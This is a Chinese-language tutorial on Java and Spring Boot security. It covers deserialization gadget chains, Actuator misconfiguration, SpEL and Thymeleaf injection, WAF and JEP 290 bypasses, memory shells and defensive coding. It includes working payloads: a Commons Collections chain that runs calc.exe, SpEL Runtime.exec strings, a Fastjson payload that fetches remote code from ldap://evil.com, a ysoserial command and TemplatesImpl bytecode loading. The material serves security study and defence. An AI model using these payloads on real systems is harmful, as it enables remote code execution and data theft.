第一章Java安全基础与反序列化原理1.1 Java序列化与反序列化机制Java 提供了一种对象持久化机制允许将对象转换为字节序列序列化以便存储或传输之后可以从字节序列中恢复出原始对象反序列化。核心接口java.io.Serializable标记接口标识类可被序列化。java.io.Externalizable继承自 Serializable允许自定义序列化逻辑。ObjectOutputStream/ObjectInputStream负责序列化和反序列化的核心类。序列化过程javaUser user new User(admin, 123456); ObjectOutputStream oos new ObjectOutputStream(new FileOutputStream(user.ser)); oos.writeObject(user); oos.close();反序列化过程javaObjectInputStream ois new ObjectInputStream(new FileInputStream(user.ser)); User user (User) ois.readObject(); ois.close();序列化数据格式序列化后的字节流包含类描述信息、字段名、字段类型、字段值等元数据。其结构大致如下Magic Number (0xACED) Version类描述符 (classDesc)对象数据 (objectData)1.2 反序列化漏洞成因反序列化漏洞的根本原因在于反序列化过程中从字节流中恢复对象时会调用某些类的特定方法如readObject、readResolve、finalize等如果这些方法中存在危险操作如反射、命令执行、文件写入等且攻击者能控制反序列化的输入数据即可触发任意代码执行。关键点入口类反序列化时自动执行的方法readObject。利用链一系列类方法调用最终导向危险操作如 Runtime.exec。POP链Property-Oriented Programming通过对象属性链调用。第二章Java原生反序列化漏洞利用链分析2.1 核心利用链Commons CollectionsApache Commons Collections 库提供了丰富的集合类其中的InvokerTransformer、ConstantTransformer、ChainedTransformer等类可以用于构造任意代码执行链。2.1.1 InvokerTransformer 的威胁InvokerTransformer实现了Transformer接口其transform方法可以通过反射调用任意方法javapublic Object transform(Object input) { // 通过反射调用 input 的指定方法 return input.getClass().getMethod(methodName, paramTypes).invoke(input, args); }如果攻击者能控制input对象就可以调用任意方法。2.1.2 经典利用链TransformedMapTransformedMap在装饰一个 Map 时可以对键值进行转换。当反序列化时如果 Map 中的元素被修改就会触发transform调用。利用思路构造一个Transformer链ConstantTransformer→InvokerTransformer。用TransformedMap.decorate包装设置转换器。利用AnnotationInvocationHandler的readObject方法中会调用setValue触发transform。代码示例简化版java// 构造命令执行链 Transformer[] transformers new Transformer[] { new ConstantTransformer(Runtime.class), new InvokerTransformer(getMethod, new Class[]{String.class, Class[].class}, new Object[]{getRuntime, new Class[0]}), new InvokerTransformer(invoke, new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}), new InvokerTransformer(exec, new Class[]{String.class}, new Object[]{calc.exe}) }; Transformer chainedTransformer new ChainedTransformer(transformers); Map innerMap new HashMap(); Map outerMap TransformedMap.decorate(innerMap, null, chainedTransformer); // 使用 AnnotationInvocationHandler 触发 Class clazz Class.forName(sun.reflect.annotation.AnnotationInvocationHandler); Constructor ctor clazz.getDeclaredConstructor(Class.class, Map.class); ctor.setAccessible(true); Object handler ctor.newInstance(Override.class, outerMap); // 序列化后反序列化即触发 serialize(handler); deserialize();2.2 其他常用利用链库名关键类利用链标识Commons Collections 3.2.1InvokerTransformer, LazyMapCC1, CC5, CC6Commons Collections 4.0InvokerTransformer (新增)CC2, CC3Commons BeanutilsPropertyUtils, BeanComparatorCB1Jackson支持多种反序列化 GadgetJackson 反序列化漏洞Fastjson自动调用 setter/getterFastjson 反序列化 RCEHibernate通过TypedValue等触发Hibernate 链Spring AOPMethodInvocationType等Spring 链2.3 高版本 JDK 的限制与绕过JDK 8u71 之后的改变AnnotationInvocationHandler的readObject不再直接调用setValue导致 CC1 失效。javax.management.BadAttributeValueExpException等新入口点被发掘。绕过思路寻找新的触发点如PriorityQueue的readObjectComparator。使用TemplatesImpl类加载任意字节码需要_bytecodes字段。2.3.1 TemplatesImpl 链com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl的getOutputProperties方法会触发newTransformer()进而加载恶意字节码。利用步骤构造恶意字节码继承AbstractTranslet。设置TemplatesImpl的_bytecodes字段。通过某个类的readObject调用getOutputProperties例如InvokerTransformer或PriorityQueueBeanComparator。2.4 原生反序列化漏洞的防御禁止反序列化不接收不可信的序列化数据。使用白名单机制ObjectInputStream重写resolveClass方法只允许指定类。javaprotected Class? resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException { String name desc.getName(); if (!allowedClasses.contains(name)) { throw new InvalidClassException(Unauthorized deserialization, name); } return super.resolveClass(desc); }使用第三方工具如 Apache Commons IO 的SerializationUtils配合ValidatingObjectInputStream。升级组件版本避免使用存在漏洞的版本如 Commons Collections 3.2.1 → 3.2.2。JEP 290Java 9 引入了序列化过滤器ObjectInputFilter可限制反序列化的类。第三章Spring Boot 安全攻防3.1 Spring Boot 特性与安全风险Spring Boot 因其自动配置、内嵌容器、Actuator 监控等特性在方便开发的同时也引入了特定安全风险。常见风险点Actuator 端点暴露敏感信息。反序列化漏洞尤其是使用 Hessian、Kryo 等 RPC 时。表达式注入SpEL。不当的输入验证导致 SQL 注入、XSS。依赖库漏洞如 fastjson、log4j2。3.2 Spring Boot Actuator 安全Actuator 提供了大量监控和管理端点默认配置下可能暴露/actuator/env环境变量、配置信息。/actuator/beans所有 Bean 信息。/actuator/mappingsURL 映射。/actuator/heapdump堆转储文件含内存敏感数据。攻击方式获取env中的spring.datasource.password、redis.password。通过heapdump分析内存提取敏感信息。结合 JolokiaJMX实现 RCE。防护措施配置management.endpoints.web.exposure.exclude*仅暴露必要端点。使用management.endpoints.web.base-path改变端点路径。结合 Spring Security 对 Actuator 端点进行认证授权。生产环境关闭 Actuator 或限制 IP。3.3 Spring Boot 反序列化漏洞3.3.1 常见反序列化入口RequestBody 接收 Java 对象默认使用 Jackson 反序列化若目标类存在危险 setter 或JsonCreator可导致 RCE。使用 Hessian / Kryo RPC这些协议本身存在反序列化漏洞。Spring Data Redis当使用 Redis 缓存 Java 对象时若配置了 JdkSerializationRedisSerializer则可能触发反序列化。HTTP Session 存储若将 Session 存储到 Redis、JDBC 且使用 Java 序列化则 Session 中的对象可被利用。3.3.2 案例分析Spring Data Redis 反序列化配置示例javaBean public RedisTemplateString, Object redisTemplate(RedisConnectionFactory factory) { RedisTemplateString, Object template new RedisTemplate(); template.setConnectionFactory(factory); template.setDefaultSerializer(new JdkSerializationRedisSerializer()); return template; }攻击场景攻击者能写入 Redis如通过未授权访问写入恶意序列化对象当应用读取时触发 RCE。防御使用Jackson2JsonRedisSerializer替代 JDK 序列化。对 Redis 进行认证和网络隔离。3.4 Spring Expression Language (SpEL) 注入SpEL 常用于注解如Value、PreAuthorize和模板解析。若用户输入被直接作为 SpEL 表达式解析可导致 RCE。危险示例javaValue(#{${user.input}}) private String value;或javapublic String parse(String expression) { ExpressionParser parser new SpelExpressionParser(); return parser.parseExpression(expression).getValue().toString(); }利用 PayloadjavaT(java.lang.Runtime).getRuntime().exec(calc.exe)防御避免用户输入直接进入 SpEL 解析器。使用SimpleEvaluationContext限制表达式功能限制类型引用、方法调用等。3.5 文件上传与目录遍历Spring Boot 默认的文件上传配置MultipartFile可能导致上传 webshell若可解析。路径遍历覆盖敏感文件。防御限制上传文件类型白名单。将文件存储在非 Web 目录通过 UUID 重命名。使用FilenameUtils或Path规范化路径防止../。3.6 其他常见漏洞漏洞类型触发场景修复建议SQL 注入使用Query拼接字符串、MyBatis ${}使用 #{} 或 JPA 规范配合参数化查询Log4j2 JNDI日志中输出用户输入如 User-Agent升级 log4j2 版本禁用 JNDIFastjson 反序列化使用 Fastjson 解析 JSON升级到最新版开启AutoType白名单敏感数据泄露Actuator、Git 信息泄露删除 .git配置 Actuator 安全第四章高级攻击技术与绕过4.1 反序列化绕过 WAF常见绕过方式分块传输在 HTTP 请求中分块发送序列化数据。编码绕过将序列化字节流进行 Base64、Gzip 编码WAF 无法识别。分段提交将恶意序列化数据拆分为多个参数服务端拼接后反序列化。4.2 JEP 290 绕过JEP 290 引入后大部分 Gadget 链被阻止。但仍存在绕过使用未被过滤的类作为入口点如java.util.HashSet。利用sun.reflect.annotation.AnnotationInvocationHandlerJDK 8u71 前。利用java.rmi.registry.Registry等 RMI 类。4.3 内存马Memory Shell在 Spring Boot 应用中通过动态注册 Controller、Filter 或 Servlet 实现无文件 webshell。实现思路获取当前应用上下文WebApplicationContext。注册自定义的Controller或Filter。通过反序列化漏洞触发注册过程。防御定期检查已注册的 Bean。使用ManagementEndpoint审计动态注册行为。使用 RASP运行时应用自我保护监控关键 API 调用。第五章安全编码与防御体系5.1 输入验证与输出编码输入验证对用户输入进行严格校验使用Valid Bean Validation。输出编码在模板Thymeleaf中默认开启 HTML 转义防止 XSS。5.2 依赖安全使用 Maven/Gradle 插件OWASP Dependency-Check定期扫描漏洞。及时升级高危依赖如 Spring Boot 版本、Log4j、Fastjson。5.3 安全配置清单Actuator关闭或认证。Session使用安全 CookieHttpOnly、Secure。HTTPS强制使用 TLS配置 HSTS。数据库使用最小权限账户连接加密。文件上传限制大小、类型存储位置隔离。日志脱敏敏感信息避免直接输出用户输入。异常处理统一处理异常不返回堆栈信息。5.4 安全测试与监控SAST静态代码分析工具如 SonarQube、FindSecBugs。DAST动态扫描工具如 Burp Suite、OWASP ZAP。RASP实时监控反序列化、命令执行等危险行为。日志监控收集安全日志检测异常行为如多次反序列化失败、敏感端点访问。第六章实战案例分析6.1 案例一Spring Boot Fastjson RCE环境Spring Boot 2.xFastjson 1.2.24触发点Controller 接收 JSON自动使用 Fastjson 解析。Payloadjson{ type:com.sun.rowset.JdbcRowSetImpl, dataSourceName:ldap://evil.com/Exploit, autoCommit:true }攻击链Fastjson 解析type实例化JdbcRowSetImpl。setAutoCommit触发connect发起 JNDI 查询。LDAP 服务返回恶意对象在客户端执行任意代码。修复升级 Fastjson 至 1.2.83 以上开启安全模式。6.2 案例二Spring Boot Actuator 配置不当场景Actuator 暴露/actuator/env且未认证。应用使用spring.datasource.url连接 MySQL。攻击步骤访问/actuator/env获取数据库密码。若密码加密通过/actuator/env的 POST 方法修改spring.datasource.url为恶意的 MySQL 服务器。利用 MySQL 的 LOAD DATA LOCAL INFILE 读取客户端文件。修复启用 Actuator 安全认证。禁止动态修改配置management.endpoint.env.post.enabledfalse。6.3 案例三Thymeleaf 模板注入场景使用 Thymeleaf 作为视图模板用户可控参数直接传入RequestParam并作为视图名。漏洞代码javaGetMapping(/page) public String page(RequestParam String name) { return user/ name; // 若 name __${T(java.lang.Runtime).getRuntime().exec(calc)}__::.x }利用Thymeleaf 解析视图名时若包含表达式语法会执行 SpEL。修复使用RequestParam时进行严格校验或避免动态拼接视图名。第七章总结与展望Java 安全的核心在于对输入数据的信任边界控制。无论是原生反序列化、Spring Boot 配置还是第三方库的滥用最终都指向同一问题不可信数据流入了危险函数。核心防御思想最小权限原则应用运行权限、数据库权限、网络权限。深度防御多层次的防护WAF → 输入校验 → 安全配置 → RASP。持续监控与更新漏洞库、依赖版本、运行时行为。未来趋势云原生安全容器化环境下的配置安全、Secret 管理。API 安全GraphQL、gRPC 等新协议的安全风险。AI 辅助安全利用大模型进行代码审计和漏洞挖掘。附录常用 Payload 与工具A.1 常用反序列化 Payload 生成工具ysoserial生成多种 Gadget 链的序列化数据。bashjava -jar ysoserial.jar CommonsCollections5 calc.exe payload.sermarshalsec用于 JNDI 注入的 RMI/LDAP 服务。A.2 Spring Boot 安全工具Spring Boot Actuator 扫描actuator-scanner脚本。HeapDump 分析使用jhat或 Eclipse MAT 提取敏感信息。A.3 常用 Payload 片段SpEL 命令执行javaT(java.lang.Runtime).getRuntime().exec(whoami)TemplatesImpl 字节码加载javabyte[] bytes ...; // 恶意类字节码 TemplatesImpl obj new TemplatesImpl(); setField(obj, _bytecodes, new byte[][]{bytes}); setField(obj, _name, test); setField(obj, _tfactory, new TransformerFactoryImpl());注本文内容仅供安全研究和防御学习使用请勿用于非法用途。在实际开发中应遵循安全开发生命周期SDL确保应用的安全性。
)
